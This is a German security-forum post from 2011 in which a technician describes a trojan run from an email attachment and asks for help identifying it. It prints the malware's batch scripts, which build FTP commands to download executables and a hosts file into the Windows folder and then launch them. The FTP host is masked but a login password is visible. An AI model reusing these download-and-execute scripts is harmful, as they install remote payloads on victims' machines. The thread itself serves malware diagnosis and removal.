Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung
Selbstgebastelter Trojaner? Funktion unbekannt?

Selbstgebastelter Trojaner? Funktion unbekannt?


Plagegeister aller Art und deren Bekämpfung: Selbstgebastelter Trojaner? Funktion unbekannt?

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

 
Vorheriger Beitrag Vorheriger Beitrag   Nächster Beitrag Nächster Beitrag
Alt 12.03.2011, 15:02   #1
Markus09
 
Selbstgebastelter Trojaner? Funktion unbekannt? - Standard

Selbstgebastelter Trojaner? Funktion unbekannt?


Hallo Forum!

Ich drehe hier am Rad...

Bei einem Kunden hat ein Azubi irgendeinen Scheiss aus einer Email ausgeführt.

adobeupdater.exe

Durch paar Tricks mit der Sandbox habe ich herausgefunden:


1) es wird im temp verzeichniss eine bat angelegt mit foglendem inhalt:

"
o ftp.XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
weiswein007
bin
lcd C:\Windows
prompt
mget Windows.exe
mget hosts
bye
"

Desweiteren werden dann per FTP anscheinend 4 Files geholt.
eine Hosts datei, "port.exe" + "Sicherheitsupdate.exe" + "windows.exe"

und im c:\windows verzeichniss gespeichert!

Die Sicherheitsupdate.xe kreirt ebenfalls eine batt mit folgendem inhalt:

"@echo off
bjfeobefwbuoefwbuiofebuoebfwobuoefuhfuhefwu6895169516951695169051690516905160915609516060516051e
uhfbuiwdvbuievbuivwebuvwebuvwebuwevubgeuweg69851695169051690516905169015690guivgfewefwiugefgiuwe
bvuiebuiewbuiwevbuevwbuwevbuwevbuevwbuiwevbuwevbuevbuwevbubuwevguiwefugwevubgiwevubgievwbuievwbui
buvwbuowvbhovwbouivwbouivwboivrguovrghiorghoijvriobhvrvrbuvrbuvrbuvrbuvbu86956895168951689516905e
jhfjkfgjfgjkfJBKfjkbgfjkgfJjbfjbffbjfbjk86956895168516895168915guifguifguifguifguif65651651651651
hjbjkiioi896569569569569561512gjbjvbowvbowvbbjbuiewbuiecbuiebuiebfui698516951651695169516givGUIvgu
uhfbuiwdvbuievbuivwebuvwebuvwebuwevubgeuweg69851695169051690516905169015690guivgfewefwiugefgiuwe
bvuiebuiewbuiwevbuevwbuwevbuwevbuevwbuiwevbuwevbuevbuwevbubuwevguiwefugwevubgiwevubgievwbuievwbui
buvwbuowvbhovwbouivwbouivwboivrguovrghiorghoijvriobhvrvrbuvrbuvrbuvrbuvbu86956895168951689516905e
jhfjkfgjfgjkfJBKfjkbgfjkgfJjbfjbffbjfbjk86956895168516895168915guifguifguifguifguif65651651651651
uhfbuiwdvbuievbuivwebuvwebuvwebuwevubgeuweg69851695169051690516905169015690guivgfewefwiugefgiuwe
bvuiebuiewbuiwevbuevwbuwevbuwevbuevwbuiwevbuwevbuevbuwevbubuwevguiwefugwevubgiwevubgievwbuievwbui
buvwbuowvbhovwbouivwbouivwboivrguovrghiorghoijvriobhvrvrbuvrbuvrbuvrbuvbu86956895168951689516905e
jhfjkfgjfgjkfJBKfjkbgfjkgfJjbfjbffbjfbjk86956895168516895168915guifguifguifguifguif65651651651651
uhfbuiwdvbuievbuivwebuvwebuvwebuwevubgeuweg69851695169051690516905169015690guivgfewefwiugefgiuwe
bvuiebuiewbuiwevbuevwbuwevbuwevbuevwbuiwevbuwevbuevbuwevbubuwevguiwefugwevubgiwevubgievwbuievwbui
buvwbuowvbhovwbouivwbouivwboivrguovrghiorghoijvriobhvrvrbuvrbuvrbuvrbuvbu86956895168951689516905e
jhfjkfgjfgjkfJBKfjkbgfjkgfJjbfjbffbjfbjk86956895168516895168915guifguifguifguifguif65651651651651
uhfbuiwdvbuievbuivwebuvwebuvwebuwevubgeuweg69851695169051690516905169015690guivgfewefwiugefgiuwe
bvuiebuiewbuiwevbuevwbuwevbuwevbuevwbuiwevbuwevbuevbuwevbubuwevguiwefugwevubgiwevubgievwbuievwbui
buvwbuowvbhovwbouivwbouivwboivrguovrghiorghoijvriobhvrvrbuvrbuvrbuvrbuvbu86956895168951689516905e
jhfjkfgjfgjkfJBKfjkbgfjkgfJjbfjbffbjfbjk86956895168516895168915guifguifguifguifguif65651651651651

> %0.ftp echo o XXXXXXXXXXXXXXXXXXXX
>> %0.ftp echo XXXXXXXXXXXXX
>> %0.ftp echo weiswein007
>> %0.ftp echo bin
>> %0.ftp echo lcd %WINDIR%
>> %0.ftp echo prompt
>> %0.ftp echo mget Sicherheitsupdate.exe
>> %0.ftp echo bye

ftp -s:%0.ftp

ping -n 60 localhost > nul & start %WINDIR%\Sicherheitsupdate.exe

exit"


Desweiteren werden einige andere files angelegt und FTP requests asgeführt welche ich nicht so schnell tracen konnte....



Hilft mir mal bitte. Was ist das hier für eine *******?!!

Ich muss die Kiste nachher platt machen... das werden 5-6 Stunden arbeit sein......


im anhang findet ihr 1x die ursprungs EXE sowie die 3-4 files welche die bat datei herunterlädt...


EDIT: ok die restliche files kann ich nicht im board anhngen da größer als 148kb...
Geändert von Markus09 (12.03.2011 um 15:35 Uhr)

 

Themen zu Selbstgebastelter Trojaner? Funktion unbekannt?
andere, anhang, arbeit, bat, board, datei, ebenfalls, email, files, folge, forum, funktion, gespeichert, inhalt, kis, kunde, localhost, scheiss, schnell, start, stunden, temp, tricks, trojaner, trojaner?, unbekannt


« Virus: TR/Drop.VB.avsj lässt sich nicht entfernen! Bitte helft mir | AntiVir TR/Dropper.gen Meldung »


Ähnliche Themen: Selbstgebastelter Trojaner? Funktion unbekannt?


  1. GVU Trojaner, weißer Bildschrim Taskmanager und abgesicherter Modus ohne Funktion
    Log-Analyse und Auswertung - 01.07.2013 (7)
  2. MSC unbekannt
    Alles rund um Windows - 20.06.2013 (3)
  3. Datei Unbekannt
    Alles rund um Windows - 28.03.2013 (1)
  4. GVU TROJANER (abgesichert Modus ohne Funktion) OTLPE
    Plagegeister aller Art und deren Bekämpfung - 17.03.2013 (19)
  5. MSE hat Trojaner entdeckt, genaue Bezeichnung dank UTS leider unbekannt
    Log-Analyse und Auswertung - 22.01.2013 (3)
  6. Bundespolizei-Trojaner mit Webcam-Funktion
    Log-Analyse und Auswertung - 08.11.2012 (19)
  7. Sheriff-Funktion / Virtueller PC vs. Verschlüsselungs-Trojaner?
    Log-Analyse und Auswertung - 08.10.2012 (9)
  8. GVU Trojaner version unbekannt WIN XP
    Plagegeister aller Art und deren Bekämpfung - 21.09.2012 (6)
  9. Trojaner PUPVShare - Antivirenprogramme ohne Funktion
    Plagegeister aller Art und deren Bekämpfung - 13.08.2012 (7)
  10. Nach GVU-Trojaner nur noch eingeschränkte Funktion sowie Meldung "roper0dun.exe"
    Plagegeister aller Art und deren Bekämpfung - 18.07.2012 (11)
  11. Tan-Abfrage durch Unbekannt! Trojaner?
    Plagegeister aller Art und deren Bekämpfung - 02.05.2011 (1)
  12. Trojaner-Board Nachrichten-Funktion
    Diskussionsforum - 23.02.2010 (2)
  13. 2 Trojaner aufm pc Turkojan und unbekannt :(
    Log-Analyse und Auswertung - 10.08.2009 (53)
  14. Unbekannte Viren oder Trojaner pc langsam und keine funktion des Taskmanager´s
    Log-Analyse und Auswertung - 19.03.2008 (11)
  15. Trojaner drauf? Prozesse sind unbekannt
    Log-Analyse und Auswertung - 11.02.2007 (2)
  16. Hilfe Hab ein Trojaner der unbekannt ist!!
    Plagegeister aller Art und deren Bekämpfung - 31.03.2005 (1)
  17. Unbekannt und HARTNÄCKIG
    Log-Analyse und Auswertung - 02.10.2004 (1)
Anleitungen und Tipps

- Für alle Hilfesuchenden! Was beachten?

- Anleitung: MyStartSearch.com entfernen

- Anleitung: WebSearches löschen

- Hilfe: iStartSurf entfernen – so gehts!

- Anleitung: Omiga Plus richtig entfernen

- Browser Viren entfernen


Zum Thema Selbstgebastelter Trojaner? Funktion unbekannt? - Hallo Forum! Ich drehe hier am Rad... Bei einem Kunden hat ein Azubi irgendeinen Scheiss aus einer Email ausgeführt. adobeupdater.exe Durch paar Tricks mit der Sandbox habe ich herausgefunden: 1) - Selbstgebastelter Trojaner? Funktion unbekannt?...
Archiv
Du betrachtest: Selbstgebastelter Trojaner? Funktion unbekannt? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131